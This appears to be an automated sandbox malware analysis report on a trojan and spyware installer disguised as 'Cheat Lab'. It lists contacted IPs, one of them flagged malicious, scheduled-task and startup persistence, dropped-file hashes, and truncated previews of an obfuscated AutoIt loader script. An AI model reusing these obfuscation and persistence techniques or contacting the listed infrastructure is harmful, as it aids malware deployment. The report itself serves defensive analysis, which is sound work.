http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000004.00000002.1808676606.0000022C41211000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1734682756.00000203CD4E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2417024179.0000022F33CB1000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/Pester/Pester | powershell.exe, 0000000E.00000002.2417024179.0000022F33ED4000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://ocsp2.globign.com/rootr306 | connect.exe, 00000010.00000003.2498819056.0000000002800000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
208.95.112.1 | ip-api.com | United States | | 53334 | TUT-ASUS | false
162.159.130.233 | cdn.discordapp.com | United States | | 13335 | CLOUDFLARENETUS | false
213.248.43.48 | unknown | Russian Federation | | 12695 | DINET-ASRU | false
45.15.156.186 | unknown | Russian Federation | | 39493 | RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRU | true
                                                          Joe Sandbox version:38.0.0 Ammolite
                                                          Analysis ID:1374044
                                                          Start date and time:2024-01-12 23:11:08 +01:00
                                                          Joe Sandbox product:CloudBasic
                                                          Overall analysis duration:0h 15m 16s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                          Number of analysed new started processes analysed:34
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:0
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Sample name:Cheat.Lab.2.7.2.msi
                                                          Detection:MAL
                                                          Classification:mal84.troj.adwa.spyw.evad.winMSI@49/74@3/4
                                                          EGA Information:
                                                          • Successful, ratio: 42.9%
                                                          HCA Information:
                                                          • Successful, ratio: 98%
                                                          • Number of executed functions: 187
                                                          • Number of non-executed functions: 217
                                                          Cookbook Comments:
                                                          • Found application associated with file extension: .msi
                                                          • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
                                                          • Excluded IPs from analysis (whitelisted): 104.72.157.175
                                                          • Excluded domains from analysis (whitelisted): www.microsoft.com-c-3.edgekey.net, ocsp.digicert.com, slscr.update.microsoft.com, e13678.dscb.akamaiedge.net, ctldl.windowsupdate.com, www.microsoft.com, fe3cr.delivery.mp.microsoft.com, www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net
                                                          • Execution Graph export aborted for target jsc.exe, PID 7848 because it is empty
                                                          • Execution Graph export aborted for target powershell.exe, PID 5084 because it is empty
                                                          • Execution Graph export aborted for target powershell.exe, PID 7256 because it is empty
                                                          • Execution Graph export aborted for target powershell.exe, PID 8144 because it is empty
                                                          • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                          • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                          • Not all processes were analyzed, report is missing behavior information
                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                          • Report size getting too big, too many NtOpenFile calls found.
                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                          • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                          • Report size getting too big, too many NtSetInformationFile calls found.
                                                          • VT rate limit hit for: Cheat.Lab.2.7.2.msi
                                                          Time      Type             Description
                                                          22:12:21  Task Scheduler   Run new task: CheatLabInstallTaskC path: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exe s>"C:\Program Files\Cheat Lab Inc\Cheat Lab\config"
                                                          22:13:15  Task Scheduler   Run new task: Y29ubmVjdDc0MQ== path: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe
                                                          22:14:13  Autostart        Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe
                                                          23:12:03  API Interceptor  86x Sleep call for process: powershell.exe modified
                                                          23:13:26  API Interceptor  5x Sleep call for process: Carbon.pif modified
                                                          23:14:11  API Interceptor  21x Sleep call for process: jsc.exe modified
                                                          23:14:15  API Interceptor  2038485x Sleep call for process: qemu-ga.exe modified
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):193434
                                                          Entropy (8bit):6.415097067134009
                                                          Encrypted:false
                                                          SSDEEP:3072:hM6KwXYKcWHBnqA2L6vFW90Y+y3jS6LhrZe6benANHPPDZ1D5GvEOi+:hBKwXYBWHRuEFW9RzLLhrUmdHDZ19Mhx
                                                          MD5:3B7A4E2DF6D5D43ADC8CFF639CB1F92D
                                                          SHA1:826FF219FF8D48A79CDABCEBADF2A5A15FB1B551
                                                          SHA-256:D0165EF14AC6FA49D4FD2F8AD6322FBAD9507C07E111E7F32F502093D9E2688F
                                                          SHA-512:655A6525C3D346701414E04FFAF117F4249F12748A475C520ED832C259A7F38BD67DAE26061FF0B0F84CBFC3EAB156C5ED0CC5C6D239538EDDD5A4017CC16DB2
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):789504
                                                          Entropy (8bit):6.523973330294715
                                                          Encrypted:false
                                                          SSDEEP:12288:ApilpMBddxHYrZsPrXcRF0vqBggQe4Vf5nklLxO4+xMbBn+odCOdQ:QjBx4rZsPUcqh/E4XsK
                                                          MD5:E1985F2668B7617E122FE727315B6D07
                                                          SHA1:FF6F2C6C1BB9456521C08640F324F8E9B7F43A5C
                                                          SHA-256:DB147CF5D4681FE82840A6CCFFB711885724D3792EE7A0D2385AA7E80E2B4B6D
                                                          SHA-512:448E25D33B751CFAE9D6D90B62B208E4002AFB4EC1F09F5ABE0BB99D43E8ECEB26E7EB1A07F2D49817EDA98203246E2766D824910E73916B107A34173579C1E6
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Reputation:unknown
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):143755
                                                          Entropy (8bit):6.131183448575568
                                                          Encrypted:false
                                                          SSDEEP:3072:Tc5IAspbrZSR8NT/dKWmxtwXIgu0i6GJYtKO4:glstrZQ8Cntw4guPJYtKO4
                                                          MD5:181C472257655DE92032B1A786E32FC8
                                                          SHA1:72BAD9D54C6A1FF446B454FDEC0BBDD71B0AAA77
                                                          SHA-256:8A0BEC3073B8FE824871017DB00E200BEAFA17AC3066FA6862810BEAC1F0CA37
                                                          SHA-512:9482650357C4F312E47D217209026EC9427BAA677F24BC6024A89A6BEBE8004AEAA3F7DEB595F3F9452AABACD659EE5AE7AE0B3315A692C3DE1AF0FC0EE5D46A
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exe
                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):789504
                                                          Entropy (8bit):6.523973330294715
                                                          Encrypted:false
                                                          SSDEEP:12288:ApilpMBddxHYrZsPrXcRF0vqBggQe4Vf5nklLxO4+xMbBn+odCOdQ:QjBx4rZsPUcqh/E4XsK
                                                          MD5:E1985F2668B7617E122FE727315B6D07
                                                          SHA1:FF6F2C6C1BB9456521C08640F324F8E9B7F43A5C
                                                          SHA-256:DB147CF5D4681FE82840A6CCFFB711885724D3792EE7A0D2385AA7E80E2B4B6D
                                                          SHA-512:448E25D33B751CFAE9D6D90B62B208E4002AFB4EC1F09F5ABE0BB99D43E8ECEB26E7EB1A07F2D49817EDA98203246E2766D824910E73916B107A34173579C1E6
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Reputation:unknown
                                                          Process:C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):143755
                                                          Entropy (8bit):6.131183448575568
                                                          Encrypted:false
                                                          SSDEEP:3072:Tc5IAspbrZSR8NT/dKWmxtwXIgu0i6GJYtKO4:glstrZQ8Cntw4guPJYtKO4
                                                          MD5:181C472257655DE92032B1A786E32FC8
                                                          SHA1:72BAD9D54C6A1FF446B454FDEC0BBDD71B0AAA77
                                                          SHA-256:8A0BEC3073B8FE824871017DB00E200BEAFA17AC3066FA6862810BEAC1F0CA37
                                                          SHA-512:9482650357C4F312E47D217209026EC9427BAA677F24BC6024A89A6BEBE8004AEAA3F7DEB595F3F9452AABACD659EE5AE7AE0B3315A692C3DE1AF0FC0EE5D46A
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:.LJ..........-.......8...L........3.......-...-...4...>...>...>...-...-...D...........$.......-.......B...3...2...L........I.......-...-...8.......<...-...8.......X...-...-...,...<...<...K.........i.......)...:.......X...U...-...-...8...........<...-...8.......X...-...-...,...<...<...8...X...K.........5.......-...-...4...G...?...-...-...D.................$.......-.......B...3...2...L................*...L...............*...L...............2).......)...M...-...8...-...8...8.......<...O...-.......X...-...+...B...-.......B...-...)..kB...-...)..kB.......-...3...=...<...<...2...L...X...-...4...5...-...=...-...)..kB...<...3...=...2...D...K.................__gc.....__len.C.......-...-...4...>...>...>...>...>...>...>...-...-...D...........$.......-.......B...3...2...L........+.......-...-...4...>...-...-...D...........$.......-.......B...3...2...L........;.......-...-...4...>...>...>...>...>...-...-...D...........$.......-.......B...3...2...L........S.......-...-...4...>...>...>...>...>...>...>
                                                          Process:C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):2545
                                                          Entropy (8bit):5.330114603578639
                                                          Encrypted:false
                                                          SSDEEP:48:MxHKlYHKh3oOfHKdHKJHKhBHK5AHKzetTHmtHo6nmHKtXoDH8HKx1qHxLHqH5HZV:iqlYqh3oSqdqJqLq2qzIGtI6mqccqxwK
                                                          MD5:C2EEC3D9A686235E7384C5D76133E31B
                                                          SHA1:FCDB906C01A19E3FDBB6DE0089019ECD6BD3F477
                                                          SHA-256:F3BF3C44AA56C07982676B59716CBD5AC32106AAC3E8960F3C6427C6E67A0DF5
                                                          SHA-512:38601BA0E3B2F9E9F1901C1E9C6BC3FF015D933A59F0DBA193342051864A98962AF47A67842755A1A253DD64E4790DC04805FD2F86D678E1BC85E38CC7E0173F
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"System.ServiceModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\a3127677749631df61e96a8400ddcb87\System.Runtime.Serialization.ni.dll",0..2,"SMDiagnostics, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.IdentityModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicK
                                                          Process:C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exe
                                                          File Type:JSON data
                                                          Category:dropped
                                                          Size (bytes):113
                                                          Entropy (8bit):4.747584446569125
                                                          Encrypted:false
                                                          SSDEEP:3:YWR4buWsyLBHrpHGR3XL5zk9fQ8W3EwAy/DMXLUcLRJu:YWybuirpH63b5AW+1CQUcS
                                                          MD5:A789AAFDA57850A3DE322E96CEF13DA3
                                                          SHA1:F2976069771FBF3AD3349BDCFC3704B52E556AC0
                                                          SHA-256:710F5CB8865A3B990E736ACB604155CC593E178F8993F1D6DE11A5B7A864E6DF
                                                          SHA-512:424266CC6127D407F5FBBF1B9891D5948176337FDC5CC1F01448B6EDCBE213614BA72488D9B8ACD495095777793CBE40B01C7A15E73D2960DE63A50593F297F0
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:{"status":"success","countryCode":"US","city":"Washington","timezone":"America/New_York","query":"102.165.48.42"}
                                                          Process:C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):5
                                                          Entropy (8bit):1.5219280948873621
                                                          Encrypted:false
                                                          SSDEEP:3:hn:h
                                                          MD5:FDA44910DEB1A460BE4AC5D56D61D837
                                                          SHA1:F6D0C643351580307B2EAA6A7560E76965496BC7
                                                          SHA-256:933B971C6388D594A23FA1559825DB5BEC8ADE2DB1240AA8FC9D0C684949E8C9
                                                          SHA-512:57DDA9AA7C29F960CD7948A4E4567844D3289FA729E9E388E7F4EDCBDF16BF6A94536598B4F9FF8942849F1F96BD3C00BC24A75E748A36FBF2A145F63BF904C1
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:0....
                                                          Process:C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exe
                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                          Category:dropped
                                                          Size (bytes):3182723
                                                          Entropy (8bit):3.588364062799384
                                                          Encrypted:false
                                                          SSDEEP:49152:yYvVqxmNpwMzWoFVKM3K/5/Meh5GtUsLgrpugTNZBaSNSEnls2240UsMF2NfcIiw:J
                                                          MD5:376559BEFAA721CB4B27D1BF5D7CA956
                                                          SHA1:9BA6B8F4CA418552C0C9E753B7F98C2E1DD5AFFF
                                                          SHA-256:DD8AF7D248AC0D43DFCEFED9901AF16F918DECF374E04C9DEC8226ACEC323E30
                                                          SHA-512:7EDBE42FD65E77E3B95F018DD7728F13EDB0EE7C02A6E1DE932C0F164B09FD1C3BE7D9BA318CFC6C3C1F11305722F14EA86E17D646DAB0166774EB5CBB5BB3F4
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):64
                                                          Entropy (8bit):0.34726597513537405
                                                          Encrypted:false
                                                          SSDEEP:3:Nlll:Nll
                                                          MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                          SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                          SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                          SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:@...e...........................................................
                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):946784
                                                          Entropy (8bit):6.628560786473655
                                                          Encrypted:false
                                                          SSDEEP:24576:LOo8pEnK4mrqlEZuVZ2HOI+X0l1lMZyYFaeBmyF:LF8p4KpqlEZeXI+X0TVcae3F
                                                          MD5:848164D084384C49937F99D5B894253E
                                                          SHA1:3055EF803EEEC4F175EBF120F94125717EE12444
                                                          SHA-256:F58D3A4B2F3F7F10815C24586FAE91964EEED830369E7E0701B43895B0CEFBD3
                                                          SHA-512:AABE1CF076F48F32542F49A92E4CA9F054B31D5A9949119991B897B9489FE775D8009896408BA49AC43EC431C87C0D385DAEAD9DBBDE7EF6309B0C97BBAF852A
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 5%
                                                          Reputation:unknown
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........;...h...h...h4;mh...h4;oh...h4;nh...h..[h...h..i...h..i...h..i...h...h...h...h...h...h...h..i..h..i...h..ch...h...h...h..i...hRich...h........PE..L......`.........."...............................@.................................!Z....@...@.......@.....................T...|....P..h............L..`&...0..,v...........................C..........@............................................text............................... ..`.rdata..r...........................@..@.data...|p.......H..................@....rsrc...h....P......................@..@.reloc..,v...0...x..................@..B................................................................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pif
                                                          File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):47584
                                                          Entropy (8bit):6.391877602293662
                                                          Encrypted:false
                                                          SSDEEP:768:DeSZaMT79n3DwU8ZCM2o1QG/n29WERqqJaqW/P8+4W:DeoaElzEZ2fG/nmkK4s+4W
                                                          MD5:94C8E57A80DFCA2482DEDB87B93D4FD9
                                                          SHA1:5729E6C7D2F5AB760F0093B9D44F8AC0F876A803
                                                          SHA-256:39E87F0EDCDD15582CFEFDFAB1975AADD2C7CA1E3A5F07B1146CE3206F401BB5
                                                          SHA-512:1798A3607B2B94732B52DE51D2748C86F9453343B6D8A417E98E65DDB38E9198CDCB2F45BF60823CB429B312466B28C5103C7588F2C4EF69FA27BFDB4F4C67DC
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Reputation:unknown
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....C.]..............0..n..........b.... ........@.. ..............................h.....`.....................................O....................x...A.......................................................... ............... ..H............text...hm... ...n.................. ..`.rsrc................p..............@..@.reloc...............v..............@..B................D.......H........D...8..........h}..p...........................................0...........(......}......}......}..... L...}......}......}......}.....s....}.....s....}.......s....}.......s....}.....s....}....r...p(......,...}....*.r...p}....*.0..........s......r...po.....r...po......(....o....s.....r...p..(...........( ...(!...o"...r!..po#...o$...t.......o.......#..rA..p..o%...(....(....(&...........*..........Tp.# .....(....*.0............}......}......}......}......}......}.....s
                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                          File Type:ASCII text, with very long lines (351), with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):734027
                                                          Entropy (8bit):5.262854021549964
                                                          Encrypted:false
                                                          SSDEEP:12288:K1+HEyKlijv8dg/TU96W+cekB1/YLY3VFqESMfe5QU4g1+cxcBTaPKONKPKjK/QY:KiQEkBOc3VF
                                                          MD5:842023619CD0567BD081FBF39071C85F
                                                          SHA1:456DCB5295F35EF621AA31D134D64D6C389010E0
                                                          SHA-256:8A9F16C42982EB3C39F659179E2639D7DBF61348F6291C7EDE36A95BB8325309
                                                          SHA-512:BE2D78062F385E49F4A7BE15E631142A0B34E56F6A9974618AF4C930D9C11A029AFD08885121F9BFD09D55274E5CAD05818AE17D20790F5E6CC9092DDC411EF8
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:$StickerWestminsterDisorders = 60..$wpcommonwealthcontroversytransmitted = 87..While 990..If $StickerWestminsterDisorders = 59 Then..ACos(8787)..Dec(RsAlso("67h112h115h106h111h104h36h88h102h111h101h122h36h75h98h111h36",7/7))..$StickerWestminsterDisorders = $StickerWestminsterDisorders + 1..EndIf..If $StickerWestminsterDisorders = 60 Then..Opt(RsAlso("86h116h99h123h75h101h113h112h74h107h102h103",4/2), 1)..ExitLoop..EndIf..If $StickerWestminsterDisorders = 61 Then..Chr(93)..PixelGetColor(63, 561, 0)..PixelGetColor(64, 144, 0)..$StickerWestminsterDisorders = $StickerWestminsterDisorders + 1..EndIf..WEnd..Func BondsProposeTutorialRelate($cedarquiltvessel, $IBMLISTEDNIGHT, $AccomplishSeminarsPowersellerChicago, $eemorganpartmusical, $ContinuingSolutions, $paragraphsaquarium, $MetallicaFinderGamesSaving)..$duerealityie = '87063082572999888278582075024919306434159951456'..$engsingingbodies = 31..$TractorChen = 95..While 797..If $engsingingbodies = 29 Then..ACos(207)..ConsoleWriteError(RsAlso(
                                                          Process:C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe
                                                          File Type:ASCII text, with very long lines (2801), with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):232267
                                                          Entropy (8bit):5.382708745310718
                                                          Encrypted:false
                                                          SSDEEP:6144:mSMfe5QU4g1+cxcBTaPKONKPKjKTu0QGqZ9I/gjW/RUeewf:mSMfe5QU4g1+cxcBTaPKONKPKjK/QGqa
                                                          MD5:52AD5EFE1E8EA006BDE6B5D81F4CBAD0
                                                          SHA1:A16041E37525B2EF85972F0DF30376361671B265
                                                          SHA-256:8AD80ED5A333EE8BF6402FAA427CC71624C9AF316686C6A8BD79DDDD1CF99A52
                                                          SHA-512:F0672CAE0AFFB5945160829CCF2E01A6F349D6ED5E656E1B98F1DD2AB7ADC83E696837F82417D1D6ABB7F949B29B995E98D0FE2AF3C9E5ABD4039DFE82567620
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:3DE46D9EFCDCBD2FAA718C12680F5527D9BF5025B8'..$WkeGOh
                                                          Process:C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):248832
                                                          Entropy (8bit):6.5845963201163595
                                                          Encrypted:false
                                                          SSDEEP:6144:LQBk7JjX74cN0lrztgwU0Wyw3mFygyE4mqd16:LO0z8e0lvSr0Wyw20K4mqm
                                                          MD5:7DA9A10F96C8863FBE469B64FB032E69
                                                          SHA1:F8CB9626C49279972DAE31A366A0050AC7B690AC
                                                          SHA-256:7C6DFCBA71E92E55FC9E3606B8A1ECCBA80BF77CF35DFE3A8552E7ACE6A986E8
                                                          SHA-512:1CD05AEAA6F0F811F14DA3AFA8881A2A620F6C4D6800A4EAF26554899B909F06DCC4F7CDAB2BBF3FAF797F7435F061157883D6C27083036EE694F9F890AF095B
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 8%
                                                          Reputation:unknown
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........;...h...h...h4;mh...h4;oh...h4;nh...h..[h...h..i...h..i...h..i...h...h...h...h...h...h...h..i..h..i...h..ch...h...h...h..i...hRich...h........PE..L......`.........."...............................@.................................!Z....@...@.......@.....................T...|....P..h............L..`&...0..,v...........................C..........@............................................text............................... ..`.rdata..r...........................@..@.data...|p.......H..................@....rsrc...h....P......................@..@.reloc..,v...0...x..................@..B................................................................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe
                                                          File Type:ASCII text, with very long lines (351), with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):501760
                                                          Entropy (8bit):5.024980168420925
                                                          Encrypted:false
                                                          SSDEEP:12288:K1+HEyKlijv8dg/TU96W+cekB1/YLY3VFqB:KiQEkBOc3Vg
                                                          MD5:475FC8C2134470C457E9B351E3FB3063
                                                          SHA1:02F9023C8F3980D8A5BEB556EC48175C2889AEE1
                                                          SHA-256:7C8ABE3F3E2803CB1E3D564E3633AA2ACF3A56FF3158A46D6D9F90F182B2FD6F
                                                          SHA-512:F56ABBC4623718B1583C450CC501386BF76C97F5380EDC96B7DA97FDB51EFFDF4536D9BAA160ADE9E1DC135CDB75E7EBA77EBFE4AACD4BD7FF909AB1D38E4DED
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:$StickerWestminsterDisorders = 60..$wpcommonwealthcontroversytransmitted = 87..While 990..If $StickerWestminsterDisorders = 59 Then..ACos(8787)..Dec(RsAlso("67h112h115h106h111h104h36h88h102h111h101h122h36h75h98h111h36",7/7))..$StickerWestminsterDisorders = $StickerWestminsterDisorders + 1..EndIf..If $StickerWestminsterDisorders = 60 Then..Opt(RsAlso("86h116h99h123h75h101h113h112h74h107h102h103",4/2), 1)..ExitLoop..EndIf..If $StickerWestminsterDisorders = 61 Then..Chr(93)..PixelGetColor(63, 561, 0)..PixelGetColor(64, 144, 0)..$StickerWestminsterDisorders = $StickerWestminsterDisorders + 1..EndIf..WEnd..Func BondsProposeTutorialRelate($cedarquiltvessel, $IBMLISTEDNIGHT, $AccomplishSeminarsPowersellerChicago, $eemorganpartmusical, $ContinuingSolutions, $paragraphsaquarium, $MetallicaFinderGamesSaving)..$duerealityie = '87063082572999888278582075024919306434159951456'..$engsingingbodies = 31..$TractorChen = 95..While 797..If $engsingingbodies = 29 Then..ACos(207)..ConsoleWriteError(RsAlso(
                                                          Process:C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):203776
                                                          Entropy (8bit):6.551787269783071
                                                          Encrypted:false
                                                          SSDEEP:6144:AsvqJX4xNAB+xHFq9O0lHPOGUWLhxjRYmFqZv:fvqJWNAB+X0lHPOGNnlMZ
                                                          MD5:8F2166189FDC760DCE63DD1BD00B5B74
                                                          SHA1:7AD603BAE906E6B4EA2864230551156B61AADEAA
                                                          SHA-256:E6FFE7B220F92B430B47ADD2A53828C4AB6FE161CDBCD8F4F2874E968624D2E5
                                                          SHA-512:0215BEFE9B989E340E50AC882B27541543EA514D30E338DCB9FA64A43E1C3DA663B06692CBA04EEBAD217065D04865850AE263DEB87B60DAE952B5B5C777866C
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):205824
                                                          Entropy (8bit):6.693217750365209
                                                          Encrypted:false
                                                          SSDEEP:6144:9lqlEAehuqN8zwNzlmhPL1b5nZ2tZ6lfA6Gfm608S:9lqlEZuB1b5Z2tZ6XKmZ
                                                          MD5:19A35B7DAB7DE9B59F4A2D6131396471
                                                          SHA1:FC67AE6AEB869FC70C5B2C2B7C93A664924B736C
                                                          SHA-256:38EDCEFED68BE599A85459864681F2437569C5E64F80B2BA295213BDF2C16E4D
                                                          SHA-512:DDDB06D09ECB584CDE24FC37DAE5B8A68BB449DCFD33E6803092361F6C349E1F0744190489FC219D67FD1F0AB0ADD5030B79E41BE172E77DC4747F5569DB4C40
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe
                                                          File Type:ASCII text, with very long lines (1965), with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):12399
                                                          Entropy (8bit):5.813140297097682
                                                          Encrypted:false
                                                          SSDEEP:384:sX9NUivIeRKqr856ErPp55ZrjZemhAsVJLs79Zy:ILLxRKqAvNOmhAsXs7W
                                                          MD5:1215DAAC9F295C3E81C35A8D5DFE6A96
                                                          SHA1:034C256198D79FAFB4BF28DBB8D37FEF59CDADE1
                                                          SHA-256:AAA08D9386A9F04ABE84672642BFDB969EDB239FA387B72ECC7C3AC2D315618E
                                                          SHA-512:0EB489D2C3843E23384F2D2F84C506ED15F3DA572BA2ADF832033F3B63E33AE0DD8CC4ABFCEE4765590BB61B4AB1722296731A5F18B8320827AA857C8A3436D7
                                                          Malicious:false
                                                          Reputation:unknown
